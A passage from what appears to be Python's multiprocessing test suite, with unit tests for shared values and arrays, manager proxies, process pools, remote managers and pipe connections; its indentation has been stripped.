self.assertEqual(sv.value, cv[1])
proc = self.Process(target=self._test, args=(values,))
proc.daemon = True
proc.start()
proc.join()
for sv, cv in zip(values, self.codes_values):
self.assertEqual(sv.value, cv[2])
def test_rawvalue(self):
self.test_value(raw=True)
def test_getobj_getlock(self):
val1 = self.Value('i', 5)
lock1 = val1.get_lock()
obj1 = val1.get_obj()
val2 = self.Value('i', 5, lock=None)
lock2 = val2.get_lock()
obj2 = val2.get_obj()
lock = self.Lock()
val3 = self.Value('i', 5, lock=lock)
lock3 = val3.get_lock()
obj3 = val3.get_obj()
self.assertEqual(lock, lock3)
arr4 = self.Value('i', 5, lock=False)
self.assertFalse(hasattr(arr4, 'get_lock'))
self.assertFalse(hasattr(arr4, 'get_obj'))
self.assertRaises(AttributeError, self.Value, 'i', 5, lock='navalue')
arr5 = self.RawValue('i', 5)
self.assertFalse(hasattr(arr5, 'get_lock'))
self.assertFalse(hasattr(arr5, 'get_obj'))
class _TestArray(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def f(cls, seq):
for i in range(1, len(seq)):
seq[i] += seq[i-1]
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_array(self, raw=False):
seq = [680, 626, 934, 821, 150, 233, 548, 982, 714, 831]
if raw:
arr = self.RawArray('i', seq)
else:
arr = self.Array('i', seq)
self.assertEqual(len(arr), len(seq))
self.assertEqual(arr[3], seq[3])
self.assertEqual(list(arr[2:7]), list(seq[2:7]))
arr[4:8] = seq[4:8] = array.array('i', [1, 2, 3, 4])
self.assertEqual(list(arr[:]), seq)
self.f(seq)
p = self.Process(target=self.f, args=(arr,))
p.daemon = True
p.start()
p.join()
self.assertEqual(list(arr[:]), seq)
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_array_from_size(self):
size = 10
# Test for zeroing (see issue #11675).
# The repetition below strengthens the test by increasing the chances
# of previously allocated non-zero memory being used for the new array
# on the 2nd and 3rd loops.
for _ in range(3):
arr = self.Array('i', size)
self.assertEqual(len(arr), size)
self.assertEqual(list(arr), [0] * size)
arr[:] = range(10)
self.assertEqual(list(arr), list(range(10)))
del arr
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_rawarray(self):
self.test_array(raw=True)
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_getobj_getlock_obj(self):
arr1 = self.Array('i', list(range(10)))
lock1 = arr1.get_lock()
obj1 = arr1.get_obj()
arr2 = self.Array('i', list(range(10)), lock=None)
lock2 = arr2.get_lock()
obj2 = arr2.get_obj()
lock = self.Lock()
arr3 = self.Array('i', list(range(10)), lock=lock)
lock3 = arr3.get_lock()
obj3 = arr3.get_obj()
self.assertEqual(lock, lock3)
arr4 = self.Array('i', range(10), lock=False)
self.assertFalse(hasattr(arr4, 'get_lock'))
self.assertFalse(hasattr(arr4, 'get_obj'))
self.assertRaises(AttributeError,
self.Array, 'i', range(10), lock='notalock')
arr5 = self.RawArray('i', range(10))
self.assertFalse(hasattr(arr5, 'get_lock'))
self.assertFalse(hasattr(arr5, 'get_obj'))
#
#
#
class _TestContainers(BaseTestCase):
ALLOWED_TYPES = ('manager',)
def test_list(self):
a = self.list(list(range(10)))
self.assertEqual(a[:], list(range(10)))
b = self.list()
self.assertEqual(b[:], [])
b.extend(list(range(5)))
self.assertEqual(b[:], list(range(5)))
self.assertEqual(b[2], 2)
self.assertEqual(b[2:10], [2,3,4])
b *= 2
self.assertEqual(b[:], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4])
self.assertEqual(b + [5, 6], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4, 5, 6])
self.assertEqual(a[:], list(range(10)))
d = [a, b]
e = self.list(d)
self.assertEqual(
[element[:] for element in e],
[[0, 1, 2, 3, 4, 5, 6, 7, 8, 9], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4]]
)
f = self.list([a])
a.append('hello')
self.assertEqual(f[0][:], [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 'hello'])
def test_list_iter(self):
a = self.list(list(range(10)))
it = iter(a)
self.assertEqual(list(it), list(range(10)))
self.assertEqual(list(it), []) # exhausted
# list modified during iteration
it = iter(a)
a[0] = 100
self.assertEqual(next(it), 100)
def test_list_proxy_in_list(self):
a = self.list([self.list(range(3)) for _i in range(3)])
self.assertEqual([inner[:] for inner in a], [[0, 1, 2]] * 3)
a[0][-1] = 55
self.assertEqual(a[0][:], [0, 1, 55])
for i in range(1, 3):
self.assertEqual(a[i][:], [0, 1, 2])
self.assertEqual(a[1].pop(), 2)
self.assertEqual(len(a[1]), 2)
for i in range(0, 3, 2):
self.assertEqual(len(a[i]), 3)
del a
b = self.list()
b.append(b)
del b
def test_dict(self):
d = self.dict()
indices = list(range(65, 70))
for i in indices:
d[i] = chr(i)
self.assertEqual(d.copy(), dict((i, chr(i)) for i in indices))
self.assertEqual(sorted(d.keys()), indices)
self.assertEqual(sorted(d.values()), [chr(i) for i in indices])
self.assertEqual(sorted(d.items()), [(i, chr(i)) for i in indices])
def test_dict_iter(self):
d = self.dict()
indices = list(range(65, 70))
for i in indices:
d[i] = chr(i)
it = iter(d)
self.assertEqual(list(it), indices)
self.assertEqual(list(it), []) # exhausted
# dictionary changed size during iteration
it = iter(d)
d.clear()
self.assertRaises(RuntimeError, next, it)
def test_dict_proxy_nested(self):
pets = self.dict(ferrets=2, hamsters=4)
supplies = self.dict(water=10, feed=3)
d = self.dict(pets=pets, supplies=supplies)
self.assertEqual(supplies['water'], 10)
self.assertEqual(d['supplies']['water'], 10)
d['supplies']['blankets'] = 5
self.assertEqual(supplies['blankets'], 5)
self.assertEqual(d['supplies']['blankets'], 5)
d['supplies']['water'] = 7
self.assertEqual(supplies['water'], 7)
self.assertEqual(d['supplies']['water'], 7)
del pets
del supplies
self.assertEqual(d['pets']['ferrets'], 2)
d['supplies']['blankets'] = 11
self.assertEqual(d['supplies']['blankets'], 11)
pets = d['pets']
supplies = d['supplies']
supplies['water'] = 7
self.assertEqual(supplies['water'], 7)
self.assertEqual(d['supplies']['water'], 7)
d.clear()
self.assertEqual(len(d), 0)
self.assertEqual(supplies['water'], 7)
self.assertEqual(pets['hamsters'], 4)
l = self.list([pets, supplies])
l[0]['marmots'] = 1
self.assertEqual(pets['marmots'], 1)
self.assertEqual(l[0]['marmots'], 1)
del pets
del supplies
self.assertEqual(l[0]['marmots'], 1)
outer = self.list([[88, 99], l])
self.assertIsInstance(outer[0], list) # Not a ListProxy
self.assertEqual(outer[-1][-1]['feed'], 3)
def test_nested_queue(self):
a = self.list() # Test queue inside list
a.append(self.Queue())
a[0].put(123)
self.assertEqual(a[0].get(), 123)
b = self.dict() # Test queue inside dict
b[0] = self.Queue()
b[0].put(456)
self.assertEqual(b[0].get(), 456)
def test_namespace(self):
n = self.Namespace()
n.name = 'Bob'
n.job = 'Builder'
n._hidden = 'hidden'
self.assertEqual((n.name, n.job), ('Bob', 'Builder'))
del n.job
self.assertEqual(str(n), "Namespace(name='Bob')")
self.assertTrue(hasattr(n, 'name'))
self.assertTrue(not hasattr(n, 'job'))
#
#
#
def sqr(x, wait=0.0):
time.sleep(wait)
return x*x
def mul(x, y):
return x*y
def raise_large_valuerror(wait):
time.sleep(wait)
raise ValueError("x" * 1024**2)
def identity(x):
return x
class CountedObject(object):
n_instances = 0
def __new__(cls):
cls.n_instances += 1
return object.__new__(cls)
def __del__(self):
type(self).n_instances -= 1
class SayWhenError(ValueError): pass
def exception_throwing_generator(total, when):
if when == -1:
raise SayWhenError("Somebody said when")
for i in range(total):
if i == when:
raise SayWhenError("Somebody said when")
yield i
class _TestPool(BaseTestCase):
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.pool = cls.Pool(4)
@classmethod
def tearDownClass(cls):
cls.pool.terminate()
cls.pool.join()
cls.pool = None
super().tearDownClass()
def test_apply(self):
papply = self.pool.apply
self.assertEqual(papply(sqr, (5,)), sqr(5))
self.assertEqual(papply(sqr, (), {'x':3}), sqr(x=3))
def test_map(self):
pmap = self.pool.map
self.assertEqual(pmap(sqr, list(range(10))), list(map(sqr, list(range(10)))))
self.assertEqual(pmap(sqr, list(range(100)), chunksize=20),
list(map(sqr, list(range(100)))))
def test_starmap(self):
psmap = self.pool.starmap
tuples = list(zip(range(10), range(9,-1, -1)))
self.assertEqual(psmap(mul, tuples),
list(itertools.starmap(mul, tuples)))
tuples = list(zip(range(100), range(99,-1, -1)))
self.assertEqual(psmap(mul, tuples, chunksize=20),
list(itertools.starmap(mul, tuples)))
def test_starmap_async(self):
tuples = list(zip(range(100), range(99,-1, -1)))
self.assertEqual(self.pool.starmap_async(mul, tuples).get(),
list(itertools.starmap(mul, tuples)))
def test_map_async(self):
self.assertEqual(self.pool.map_async(sqr, list(range(10))).get(),
list(map(sqr, list(range(10)))))
def test_map_async_callbacks(self):
call_args = self.manager.list() if self.TYPE == 'manager' else []
self.pool.map_async(int, ['1'],
callback=call_args.append,
error_callback=call_args.append).wait()
self.assertEqual(1, len(call_args))
self.assertEqual([1], call_args[0])
self.pool.map_async(int, ['a'],
callback=call_args.append,
error_callback=call_args.append).wait()
self.assertEqual(2, len(call_args))
self.assertIsInstance(call_args[1], ValueError)
def test_map_unplicklable(self):
# Issue #19425 -- failure to pickle should not cause a hang
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
class A(object):
def __reduce__(self):
raise RuntimeError('cannot pickle')
with self.assertRaises(RuntimeError):
self.pool.map(sqr, [A()]*10)
def test_map_chunksize(self):
try:
self.pool.map_async(sqr, [], chunksize=1).get(timeout=TIMEOUT1)
except multiprocessing.TimeoutError:
self.fail("pool.map_async with chunksize stalled on null list")
def test_map_handle_iterable_exception(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# SayWhenError seen at the very first of the iterable
with self.assertRaises(SayWhenError):
self.pool.map(sqr, exception_throwing_generator(1, -1), 1)
# again, make sure it's reentrant
with self.assertRaises(SayWhenError):
self.pool.map(sqr, exception_throwing_generator(1, -1), 1)
with self.assertRaises(SayWhenError):
self.pool.map(sqr, exception_throwing_generator(10, 3), 1)
class SpecialIterable:
def __iter__(self):
return self
def __next__(self):
raise SayWhenError
def __len__(self):
return 1
with self.assertRaises(SayWhenError):
self.pool.map(sqr, SpecialIterable(), 1)
with self.assertRaises(SayWhenError):
self.pool.map(sqr, SpecialIterable(), 1)
def test_async(self):
res = self.pool.apply_async(sqr, (7, TIMEOUT1,))
get = TimingWrapper(res.get)
self.assertEqual(get(), 49)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT1)
def test_async_timeout(self):
res = self.pool.apply_async(sqr, (6, TIMEOUT2 + 1.0))
get = TimingWrapper(res.get)
self.assertRaises(multiprocessing.TimeoutError, get, timeout=TIMEOUT2)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT2)
def test_imap(self):
it = self.pool.imap(sqr, list(range(10)))
self.assertEqual(list(it), list(map(sqr, list(range(10)))))
it = self.pool.imap(sqr, list(range(10)))
for i in range(10):
self.assertEqual(next(it), i*i)
self.assertRaises(StopIteration, it.__next__)
it = self.pool.imap(sqr, list(range(1000)), chunksize=100)
for i in range(1000):
self.assertEqual(next(it), i*i)
self.assertRaises(StopIteration, it.__next__)
def test_imap_handle_iterable_exception(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# SayWhenError seen at the very first of the iterable
it = self.pool.imap(sqr, exception_throwing_generator(1, -1), 1)
self.assertRaises(SayWhenError, it.__next__)
# again, make sure it's reentrant
it = self.pool.imap(sqr, exception_throwing_generator(1, -1), 1)
self.assertRaises(SayWhenError, it.__next__)
it = self.pool.imap(sqr, exception_throwing_generator(10, 3), 1)
for i in range(3):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
# SayWhenError seen at start of problematic chunk's results
it = self.pool.imap(sqr, exception_throwing_generator(20, 7), 2)
for i in range(6):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
it = self.pool.imap(sqr, exception_throwing_generator(20, 7), 4)
for i in range(4):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
def test_imap_unordered(self):
it = self.pool.imap_unordered(sqr, list(range(10)))
self.assertEqual(sorted(it), list(map(sqr, list(range(10)))))
it = self.pool.imap_unordered(sqr, list(range(1000)), chunksize=100)
self.assertEqual(sorted(it), list(map(sqr, list(range(1000)))))
def test_imap_unordered_handle_iterable_exception(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# SayWhenError seen at the very first of the iterable
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(1, -1),
1)
self.assertRaises(SayWhenError, it.__next__)
# again, make sure it's reentrant
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(1, -1),
1)
self.assertRaises(SayWhenError, it.__next__)
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(10, 3),
1)
expected_values = list(map(sqr, list(range(10))))
with self.assertRaises(SayWhenError):
# imap_unordered makes it difficult to anticipate the SayWhenError
for i in range(10):
value = next(it)
self.assertIn(value, expected_values)
expected_values.remove(value)
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(20, 7),
2)
expected_values = list(map(sqr, list(range(20))))
with self.assertRaises(SayWhenError):
for i in range(20):
value = next(it)
self.assertIn(value, expected_values)
expected_values.remove(value)
def test_make_pool(self):
expected_error = (RemoteError if self.TYPE == 'manager'
else ValueError)
self.assertRaises(expected_error, self.Pool, -1)
self.assertRaises(expected_error, self.Pool, 0)
if self.TYPE != 'manager':
p = self.Pool(3)
try:
self.assertEqual(3, len(p._pool))
finally:
p.close()
p.join()
def test_terminate(self):
result = self.pool.map_async(
time.sleep, [0.1 for i in range(10000)], chunksize=1
)
self.pool.terminate()
join = TimingWrapper(self.pool.join)
join()
# Sanity check the pool didn't wait for all tasks to finish
self.assertLess(join.elapsed, 2.0)
def test_empty_iterable(self):
# See Issue 12157
p = self.Pool(1)
self.assertEqual(p.map(sqr, []), [])
self.assertEqual(list(p.imap(sqr, [])), [])
self.assertEqual(list(p.imap_unordered(sqr, [])), [])
self.assertEqual(p.map_async(sqr, []).get(), [])
p.close()
p.join()
def test_context(self):
if self.TYPE == 'processes':
L = list(range(10))
expected = [sqr(i) for i in L]
with self.Pool(2) as p:
r = p.map_async(sqr, L)
self.assertEqual(r.get(), expected)
p.join()
self.assertRaises(ValueError, p.map_async, sqr, L)
@classmethod
def _test_traceback(cls):
raise RuntimeError(123) # some comment
def test_traceback(self):
# We want ensure that the traceback from the child process is
# contained in the traceback raised in the main process.
if self.TYPE == 'processes':
with self.Pool(1) as p:
try:
p.apply(self._test_traceback)
except Exception as e:
exc = e
else:
self.fail('expected RuntimeError')
p.join()
self.assertIs(type(exc), RuntimeError)
self.assertEqual(exc.args, (123,))
cause = exc.__cause__
self.assertIs(type(cause), multiprocessing.pool.RemoteTraceback)
self.assertIn('raise RuntimeError(123) # some comment', cause.tb)
with test.support.captured_stderr() as f1:
try:
raise exc
except RuntimeError:
sys.excepthook(*sys.exc_info())
self.assertIn('raise RuntimeError(123) # some comment',
f1.getvalue())
# _helper_reraises_exception should not make the error
# a remote exception
with self.Pool(1) as p:
try:
p.map(sqr, exception_throwing_generator(1, -1), 1)
except Exception as e:
exc = e
else:
self.fail('expected SayWhenError')
self.assertIs(type(exc), SayWhenError)
self.assertIs(exc.__cause__, None)
p.join()
@classmethod
def _test_wrapped_exception(cls):
raise RuntimeError('foo')
def test_wrapped_exception(self):
# Issue #20980: Should not wrap exception when using thread pool
with self.Pool(1) as p:
with self.assertRaises(RuntimeError):
p.apply(self._test_wrapped_exception)
p.join()
def test_map_no_failfast(self):
# Issue #23992: the fail-fast behaviour when an exception is raised
# during map() would make Pool.join() deadlock, because a worker
# process would fill the result queue (after the result handler thread
# terminated, hence not draining it anymore).
t_start = time.monotonic()
with self.assertRaises(ValueError):
with self.Pool(2) as p:
try:
p.map(raise_large_valuerror, [0, 1])
finally:
time.sleep(0.5)
p.close()
p.join()
# check that we indeed waited for all jobs
self.assertGreater(time.monotonic() - t_start, 0.9)
def test_release_task_refs(self):
# Issue #29861: task arguments and results should not be kept
# alive after we are done with them.
objs = [CountedObject() for i in range(10)]
refs = [weakref.ref(o) for o in objs]
self.pool.map(identity, objs)
del objs
gc.collect() # For PyPy or other GCs.
time.sleep(DELTA) # let threaded cleanup code run
self.assertEqual(set(wr() for wr in refs), {None})
# With a process pool, copies of the objects are returned, check
# they were released too.
self.assertEqual(CountedObject.n_instances, 0)
def test_enter(self):
if self.TYPE == 'manager':
self.skipTest("test not applicable to manager")
pool = self.Pool(1)
with pool:
pass
# call pool.terminate()
# pool is no longer running
with self.assertRaises(ValueError):
# bpo-35477: pool.__enter__() fails if the pool is not running
with pool:
pass
pool.join()
def test_resource_warning(self):
if self.TYPE == 'manager':
self.skipTest("test not applicable to manager")
pool = self.Pool(1)
pool.terminate()
pool.join()
# force state to RUN to emit ResourceWarning in __del__()
pool._state = multiprocessing.pool.RUN
with support.check_warnings(('unclosed running multiprocessing pool',
ResourceWarning)):
pool = None
support.gc_collect()
def raising():
raise KeyError("key")
def unpickleable_result():
return lambda: 42
class _TestPoolWorkerErrors(BaseTestCase):
ALLOWED_TYPES = ('processes', )
def test_async_error_callback(self):
p = multiprocessing.Pool(2)
scratchpad = [None]
def errback(exc):
scratchpad[0] = exc
res = p.apply_async(raising, error_callback=errback)
self.assertRaises(KeyError, res.get)
self.assertTrue(scratchpad[0])
self.assertIsInstance(scratchpad[0], KeyError)
p.close()
p.join()
def test_unpickleable_result(self):
from multiprocessing.pool import MaybeEncodingError
p = multiprocessing.Pool(2)
# Make sure we don't lose pool processes because of encoding errors.
for iteration in range(20):
scratchpad = [None]
def errback(exc):
scratchpad[0] = exc
res = p.apply_async(unpickleable_result, error_callback=errback)
self.assertRaises(MaybeEncodingError, res.get)
wrapped = scratchpad[0]
self.assertTrue(wrapped)
self.assertIsInstance(scratchpad[0], MaybeEncodingError)
self.assertIsNotNone(wrapped.exc)
self.assertIsNotNone(wrapped.value)
p.close()
p.join()
class _TestPoolWorkerLifetime(BaseTestCase):
ALLOWED_TYPES = ('processes', )
def test_pool_worker_lifetime(self):
p = multiprocessing.Pool(3, maxtasksperchild=10)
self.assertEqual(3, len(p._pool))
origworkerpids = [w.pid for w in p._pool]
# Run many tasks so each worker gets replaced (hopefully)
results = []
for i in range(100):
results.append(p.apply_async(sqr, (i, )))
# Fetch the results and verify we got the right answers,
# also ensuring all the tasks have completed.
for (j, res) in enumerate(results):
self.assertEqual(res.get(), sqr(j))
# Refill the pool
p._repopulate_pool()
# Wait until all workers are alive
# (countdown * DELTA = 5 seconds max startup process time)
countdown = 50
while countdown and not all(w.is_alive() for w in p._pool):
countdown -= 1
time.sleep(DELTA)
finalworkerpids = [w.pid for w in p._pool]
# All pids should be assigned. See issue #7805.
self.assertNotIn(None, origworkerpids)
self.assertNotIn(None, finalworkerpids)
# Finally, check that the worker pids have changed
self.assertNotEqual(sorted(origworkerpids), sorted(finalworkerpids))
p.close()
p.join()
def test_pool_worker_lifetime_early_close(self):
# Issue #10332: closing a pool whose workers have limited lifetimes
# before all the tasks completed would make join() hang.
p = multiprocessing.Pool(3, maxtasksperchild=1)
results = []
for i in range(6):
results.append(p.apply_async(sqr, (i, 0.3)))
p.close()
p.join()
# check the results
for (j, res) in enumerate(results):
self.assertEqual(res.get(), sqr(j))
def test_worker_finalization_via_atexit_handler_of_multiprocessing(self):
# tests cases against bpo-38744 and bpo-39360
cmd = '''if 1:
from multiprocessing import Pool
problem = None
class A:
def __init__(self):
self.pool = Pool(processes=1)
def test():
global problem
problem = A()
problem.pool.map(float, tuple(range(10)))
if __name__ == "__main__":
test()
'''
rc, out, err = test.support.script_helper.assert_python_ok('-c', cmd)
self.assertEqual(rc, 0)
#
# Test of creating a customized manager class
#
from multiprocessing.managers import BaseManager, BaseProxy, RemoteError
class FooBar(object):
def f(self):
return 'f()'
def g(self):
raise ValueError
def _h(self):
return '_h()'
def baz():
for i in range(10):
yield i*i
class IteratorProxy(BaseProxy):
_exposed_ = ('__next__',)
def __iter__(self):
return self
def __next__(self):
return self._callmethod('__next__')
class MyManager(BaseManager):
pass
MyManager.register('Foo', callable=FooBar)
MyManager.register('Bar', callable=FooBar, exposed=('f', '_h'))
MyManager.register('baz', callable=baz, proxytype=IteratorProxy)
class _TestMyManager(BaseTestCase):
ALLOWED_TYPES = ('manager',)
def test_mymanager(self):
manager = MyManager()
manager.start()
self.common(manager)
manager.shutdown()
# bpo-30356: BaseManager._finalize_manager() sends SIGTERM
# to the manager process if it takes longer than 1 second to stop,
# which happens on slow buildbots.
self.assertIn(manager._process.exitcode, (0, -signal.SIGTERM))
def test_mymanager_context(self):
with MyManager() as manager:
self.common(manager)
# bpo-30356: BaseManager._finalize_manager() sends SIGTERM
# to the manager process if it takes longer than 1 second to stop,
# which happens on slow buildbots.
self.assertIn(manager._process.exitcode, (0, -signal.SIGTERM))
def test_mymanager_context_prestarted(self):
manager = MyManager()
manager.start()
with manager:
self.common(manager)
self.assertEqual(manager._process.exitcode, 0)
def common(self, manager):
foo = manager.Foo()
bar = manager.Bar()
baz = manager.baz()
foo_methods = [name for name in ('f', 'g', '_h') if hasattr(foo, name)]
bar_methods = [name for name in ('f', 'g', '_h') if hasattr(bar, name)]
self.assertEqual(foo_methods, ['f', 'g'])
self.assertEqual(bar_methods, ['f', '_h'])
self.assertEqual(foo.f(), 'f()')
self.assertRaises(ValueError, foo.g)
self.assertEqual(foo._callmethod('f'), 'f()')
self.assertRaises(RemoteError, foo._callmethod, '_h')
self.assertEqual(bar.f(), 'f()')
self.assertEqual(bar._h(), '_h()')
self.assertEqual(bar._callmethod('f'), 'f()')
self.assertEqual(bar._callmethod('_h'), '_h()')
self.assertEqual(list(baz), [i*i for i in range(10)])
#
# Test of connecting to a remote server and using xmlrpclib for serialization
#
_queue = pyqueue.Queue()
def get_queue():
return _queue
class QueueManager(BaseManager):
'''manager class used by server process'''
QueueManager.register('get_queue', callable=get_queue)
class QueueManager2(BaseManager):
'''manager class which specifies the same interface as QueueManager'''
QueueManager2.register('get_queue')
SERIALIZER = 'xmlrpclib'
class _TestRemoteManager(BaseTestCase):
ALLOWED_TYPES = ('manager',)
values = ['hello world', None, True, 2.25,
'hall\xe5 v\xe4rlden',
'\u043f\u0440\u0438\u0432\u0456\u0442 \u0441\u0432\u0456\u0442',
b'hall\xe5 v\xe4rlden',
]
result = values[:]
@classmethod
def _putter(cls, address, authkey):
manager = QueueManager2(
address=address, authkey=authkey, serializer=SERIALIZER
)
manager.connect()
queue = manager.get_queue()
# Note that xmlrpclib will deserialize object as a list not a tuple
queue.put(tuple(cls.values))
def test_remote(self):
authkey = os.urandom(32)
manager = QueueManager(
address=(socket_helper.HOST, 0), authkey=authkey, serializer=SERIALIZER
)
manager.start()
self.addCleanup(manager.shutdown)
p = self.Process(target=self._putter, args=(manager.address, authkey))
p.daemon = True
p.start()
manager2 = QueueManager2(
address=manager.address, authkey=authkey, serializer=SERIALIZER
)
manager2.connect()
queue = manager2.get_queue()
self.assertEqual(queue.get(), self.result)
# Because we are using xmlrpclib for serialization instead of
# pickle this will cause a serialization error.
self.assertRaises(Exception, queue.put, time.sleep)
# Make queue finalizer run before the server is stopped
del queue
@hashlib_helper.requires_hashdigest('md5')
class _TestManagerRestart(BaseTestCase):
@classmethod
def _putter(cls, address, authkey):
manager = QueueManager(
address=address, authkey=authkey, serializer=SERIALIZER)
manager.connect()
queue = manager.get_queue()
queue.put('hello world')
def test_rapid_restart(self):
authkey = os.urandom(32)
manager = QueueManager(
address=(socket_helper.HOST, 0), authkey=authkey, serializer=SERIALIZER)
try:
srvr = manager.get_server()
addr = srvr.address
# Close the connection.Listener socket which gets opened as a part
# of manager.get_server(). It's not needed for the test.
srvr.listener.close()
manager.start()
p = self.Process(target=self._putter, args=(manager.address, authkey))
p.start()
p.join()
queue = manager.get_queue()
self.assertEqual(queue.get(), 'hello world')
del queue
finally:
if hasattr(manager, "shutdown"):
manager.shutdown()
manager = QueueManager(
address=addr, authkey=authkey, serializer=SERIALIZER)
try:
manager.start()
self.addCleanup(manager.shutdown)
except OSError as e:
if e.errno != errno.EADDRINUSE:
raise
# Retry after some time, in case the old socket was lingering
# (sporadic failure on buildbots)
time.sleep(1.0)
manager = QueueManager(
address=addr, authkey=authkey, serializer=SERIALIZER)
if hasattr(manager, "shutdown"):
self.addCleanup(manager.shutdown)
#
#
#
SENTINEL = latin('')
class _TestConnection(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
@classmethod
def _echo(cls, conn):
for msg in iter(conn.recv_bytes, SENTINEL):
conn.send_bytes(msg)
conn.close()
def test_connection(self):
conn, child_conn = self.Pipe()
p = self.Process(target=self._echo, args=(child_conn,))
p.daemon = True
p.start()
seq = [1, 2.25, None]
msg = latin('hello world')
longmsg = msg * 10
arr = array.array('i', list(range(4)))
if self.TYPE == 'processes':
self.assertEqual(type(conn.fileno()), int)
self.assertEqual(conn.send(seq), None)
self.assertEqual(conn.recv(), seq)
self.assertEqual(conn.send_bytes(msg), None)
self.assertEqual(conn.recv_bytes(), msg)
if self.TYPE == 'processes':
buffer = array.array('i', [0]*10)
expected = list(arr) + [0] * (10 - len(arr))
self.assertEqual(conn.send_bytes(arr), None)
self.assertEqual(conn.recv_bytes_into(buffer),
len(arr) * buffer.itemsize)
self.assertEqual(list(buffer), expected)
buffer = array.array('i', [0]*10)
expected = [0] * 3 + list(arr) + [0] * (10 - 3 - len(arr))
self.assertEqual(conn.send_bytes(arr), None)
self.assertEqual(conn.recv_bytes_into(buffer, 3 * buffer.itemsize),
len(arr) * buffer.itemsize)
self.assertEqual(list(buffer), expected)
buffer = bytearray(latin(' ' * 40))
self.assertEqual(conn.send_bytes(longmsg), None)
try:
res = conn.recv_bytes_into(buffer)
except multiprocessing.BufferTooShort as e:
self.assertEqual(e.args, (longmsg,))
else:
self.fail('expected BufferTooShort, got %s' % res)
poll = TimingWrapper(conn.poll)
self.assertEqual(poll(), False)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(poll(-1), False)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(poll(TIMEOUT1), False)
self.assertTimingAlmostEqual(poll.elapsed, TIMEOUT1)
conn.send(None)
time.sleep(.1)
self.assertEqual(poll(TIMEOUT1), True)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(conn.recv(), None)
really_big_msg = latin('X') * (1024 * 1024 * 16) # 16Mb
conn.send_bytes(really_big_msg)
self.assertEqual(conn.recv_bytes(), really_big_msg)
conn.send_bytes(SENTINEL) # tell child to quit
child_conn.close()
if self.TYPE == 'processes':
self.assertEqual(conn.readable, True)
self.assertEqual(conn.writable, True)
self.assertRaises(EOFError, conn.recv)
self.assertRaises(EOFError, conn.recv_bytes)
p.join()
def test_duplex_false(self):
reader, writer = self.Pipe(duplex=False)
self.assertEqual(writer.send(1), None)
self.assertEqual(reader.recv(), 1)
if self.TYPE == 'processes':
self.assertEqual(reader.readable, True)
self.assertEqual(reader.writable, False)
self.assertEqual(writer.readable, False)
self.assertEqual(writer.writable, True)
self.assertRaises(OSError, reader.send, 2)
self.assertRaises(OSError, writer.recv)
self.assertRaises(OSError, writer.poll)
def test_spawn_close(self):
# We test that a pipe connection can be closed by parent
# process immediately after child is spawned. On Windows this
# would have sometimes failed on old versions because
# child_conn would be closed before the child got a chance to
# duplicate it.
conn, child_conn = self.Pipe()
p = self.Process(target=self._echo, args=(child_conn,))
p.daemon = True
p.start()
child_conn.close() # this might complete before child initializes
msg = latin('hello')
conn.send_bytes(msg)
self.assertEqual(conn.recv_bytes(), msg)
conn.send_bytes(SENTINEL)
conn.close()
p.join()
def test_sendbytes(self):
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
msg = latin('abcdefghijklmnopqrstuvwxyz')
a, b = self.Pipe()
a.send_bytes(msg)
self.assertEqual(b.recv_bytes(), msg)
a.send_bytes(msg, 5)
self.assertEqual(b.recv_bytes(), msg[5:])
a.send_bytes(msg, 7, 8)
self.assertEqual(b.recv_bytes(), msg[7:7+8])
a.send_bytes(msg, 26)
self.assertEqual(b.recv_bytes(), latin(''))
a.send_bytes(msg, 26, 0)
self.assertEqual(b.recv_bytes(), latin(''))
self.assertRaises(ValueError, a.send_bytes, msg, 27)
self.assertRaises(ValueError, a.send_bytes, msg, 22, 5)
self.assertRaises(ValueError, a.send_bytes, msg, 26, 1)
self.assertRaises(ValueError, a.send_bytes, msg, -1)
self.assertRaises(ValueError, a.send_bytes, msg, 4, -1)
@classmethod
def _is_fd_assigned(cls, fd):
try:
os.fstat(fd)
except OSError as e:
if e.errno == errno.EBADF:
return False
raise
else:
return True
@classmethod
def _writefd(cls, conn, data, create_dummy_fds=False):
if create_dummy_fds:
for i in range(0, 256):
if not cls._is_fd_assigned(i):
os.dup2(conn.fileno(), i)
fd = reduction.recv_handle(conn)
if msvcrt:
fd = msvcrt.open_osfhandle(fd, os.O_WRONLY)
os.write(fd, data)
os.close(fd)
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
def test_fd_transfer(self):
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._writefd, args=(child_conn, b"foo"))
p.daemon = True
p.start()
self.addCleanup(test.support.unlink, test.support.TESTFN)
with open(test.support.TESTFN, "wb") as f:
fd = f.fileno()
if msvcrt:
fd = msvcrt.get_osfhandle(fd)
reduction.send_handle(conn, fd, p.pid)
p.join()
with open(test.support.TESTFN, "rb") as f:
